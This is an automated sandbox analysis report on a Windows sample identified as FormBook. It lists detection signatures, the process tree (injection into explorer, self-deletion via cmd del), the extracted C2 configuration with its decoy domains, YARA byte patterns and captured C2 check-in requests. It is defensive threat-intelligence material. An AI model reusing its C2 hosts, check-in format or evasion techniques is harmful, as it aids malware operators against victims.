Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report TT COPY_02101011.exe

Overview

General Information

Sample Name:TT COPY_02101011.exe
Analysis ID:528714
MD5:ebabc0d66a9e01cc0926f3b311feff5f
SHA1:83a44664135a7255045becde754dae29be496c8f
SHA256:ea8733d0ea6248e2f522487d09e7854230a648e67f1a5e90fea31f6305a1ff7b
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • TT COPY_02101011.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: EBABC0D66A9E01CC0926F3B311FEFF5F)
    • TT COPY_02101011.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: EBABC0D66A9E01CC0926F3B311FEFF5F)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • NETSTAT.EXE (PID: 744 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 7080 cmdline: /c del "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.helpfromjames.com/e8ia/"], "decoy": ["le-hameau-enchanteur.com", "quantumsystem-au.club", "engravedeeply.com", "yesrecompensas.lat", "cavallitowerofficials.com", "800seaspray.com", "skifun-jetski.com", "thouartafoot.com", "nft2dollar.com", "petrestore.online", "cjcutthecord2.com", "tippimccullough.com", "gadget198.xyz", "djmiriam.com", "bitbasepay.com", "cukierniawz.com", "mcclureic.xyz", "inthekitchenshakinandbakin.com", "busy-clicks.com", "melaniemorris.online", "elysiangp.com", "7bkj.com", "wakeanddraw.com", "ascalar.com", "iteraxon.com", "henleygirlscricket.com", "torresflooringdecorllc.com", "helgquieta.quest", "xesteem.com", "graffity-aws.com", "bolerparts.com", "andriylysenko.com", "bestinvest-4-you.com", "frelsicycling.com", "airductcleaningindianapolis.net", "nlproperties.net", "alkoora.xyz", "sakiyaman.com", "wwwsmyrnaschooldistrict.com", "unitedsafetyassociation.com", "fiveallianceapparel.com", "edgelordkids.com", "herhauling.com", "intelldat.com", "weprepareamerica-planet.com", "webartsolution.net", "yiquge.com", "marraasociados.com", "dentalimplantnearyou-ca.space", "linemanbible.com", "dunamisdispatchservicellc.com", "latamoperationalinstitute.com", "stpaulsschoolbagidora.com", "groupninemed.com", "solar-tribe.com", "footairdz.com", "blttsperma.quest", "xfeuio.xyz", "sahodyafbdchapter.com", "0934800.com", "dandftrading.com", "gladway.net", "mineriasinmercurio.com", "inaampm.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.TT COPY_02101011.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.TT COPY_02101011.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.TT COPY_02101011.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        1.0.TT COPY_02101011.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.0.TT COPY_02101011.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.helpfromjames.com/e8ia/"], "decoy": ["le-hameau-enchanteur.com", "quantumsystem-au.club", "engravedeeply.com", "yesrecompensas.lat", "cavallitowerofficials.com", "800seaspray.com", "skifun-jetski.com", "thouartafoot.com", "nft2dollar.com", "petrestore.online", "cjcutthecord2.com", "tippimccullough.com", "gadget198.xyz", "djmiriam.com", "bitbasepay.com", "cukierniawz.com", "mcclureic.xyz", "inthekitchenshakinandbakin.com", "busy-clicks.com", "melaniemorris.online", "elysiangp.com", "7bkj.com", "wakeanddraw.com", "ascalar.com", "iteraxon.com", "henleygirlscricket.com", "torresflooringdecorllc.com", "helgquieta.quest", "xesteem.com", "graffity-aws.com", "bolerparts.com", "andriylysenko.com", "bestinvest-4-you.com", "frelsicycling.com", "airductcleaningindianapolis.net", "nlproperties.net", "alkoora.xyz", "sakiyaman.com", "wwwsmyrnaschooldistrict.com", "unitedsafetyassociation.com", "fiveallianceapparel.com", "edgelordkids.com", "herhauling.com", "intelldat.com", "weprepareamerica-planet.com", "webartsolution.net", "yiquge.com", "marraasociados.com", "dentalimplantnearyou-ca.space", "linemanbible.com", "dunamisdispatchservicellc.com", "latamoperationalinstitute.com", "stpaulsschoolbagidora.com", "groupninemed.com", "solar-tribe.com", "footairdz.com", "blttsperma.quest", "xfeuio.xyz", "sahodyafbdchapter.com", "0934800.com", "dandftrading.com", "gladway.net", "mineriasinmercurio.com", "inaampm.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: TT COPY_02101011.exeVirustotal: Detection: 36%Perma Link
          Source: TT COPY_02101011.exeReversingLabs: Detection: 15%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dllReversingLabs: Detection: 15%
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dllJoe Sandbox ML: detected
          Source: 1.0.TT COPY_02101011.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.TT COPY_02101011.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.TT COPY_02101011.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.TT COPY_02101011.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
          Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.NETSTAT.EXE.372796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.TT COPY_02101011.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.NETSTAT.EXE.d6e840.0.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.0.TT COPY_02101011.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: TT COPY_02101011.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: TT COPY_02101011.exe, 00000000.00000003.677689499.0000000002A70000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000000.00000003.677942746.0000000002C00000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TT COPY_02101011.exe, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00402630 FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 37.123.118.150 80
          Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80
          Source: C:\Windows\explorer.exeDomain query: www.webartsolution.net
          Source: C:\Windows\explorer.exeNetwork Connect: 185.65.236.168 80
          Source: C:\Windows\explorer.exeDomain query: www.mcclureic.xyz
          Source: C:\Windows\explorer.exeDomain query: www.gadget198.xyz
          Source: C:\Windows\explorer.exeDomain query: www.intelldat.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.96.23.237 80
          Source: C:\Windows\explorer.exeDomain query: www.helpfromjames.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.158.42 80
          Source: C:\Windows\explorer.exeDomain query: www.le-hameau-enchanteur.com
          Source: C:\Windows\explorer.exeDomain query: www.blttsperma.quest
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.125.56 80
          Source: C:\Windows\explorer.exeNetwork Connect: 151.139.128.11 80
          Source: C:\Windows\explorer.exeDomain query: www.yesrecompensas.lat
          Source: C:\Windows\explorer.exeDomain query: www.henleygirlscricket.com
          Source: C:\Windows\explorer.exeNetwork Connect: 143.95.80.65 80
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.mcclureic.xyz
          Source: C:\Windows\explorer.exeDNS query: www.gadget198.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.helpfromjames.com/e8ia/
          Source: Joe Sandbox ViewASN Name: UK2NET-ASGB UK2NET-ASGB
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz HTTP/1.1Host: www.yesrecompensas.latConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz HTTP/1.1Host: www.gadget198.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz HTTP/1.1Host: www.le-hameau-enchanteur.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=Y16Z63O1gty4jexpGTflGuIz4Gugt4GYAlGZJQf+kV2UdFWHFdKuPaLe5BRm7+ulCaVU&xTh4=5jvdevo8uz HTTP/1.1Host: www.henleygirlscricket.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz HTTP/1.1Host: www.webartsolution.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz HTTP/1.1Host: www.blttsperma.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz HTTP/1.1Host: www.intelldat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 37.123.118.150 37.123.118.150
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.10.3 (Ubuntu)Date: Thu, 25 Nov 2021 16:50:07 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>
          Source: TT COPY_02101011.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: TT COPY_02101011.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: unknownDNS traffic detected: queries for: www.mcclureic.xyz
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz HTTP/1.1Host: www.yesrecompensas.latConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz HTTP/1.1Host: www.gadget198.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz HTTP/1.1Host: www.le-hameau-enchanteur.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=Y16Z63O1gty4jexpGTflGuIz4Gugt4GYAlGZJQf+kV2UdFWHFdKuPaLe5BRm7+ulCaVU&xTh4=5jvdevo8uz HTTP/1.1Host: www.henleygirlscricket.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz HTTP/1.1Host: www.webartsolution.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz HTTP/1.1Host: www.blttsperma.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz HTTP/1.1Host: www.intelldat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\TT COPY_02101011.exeCode function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
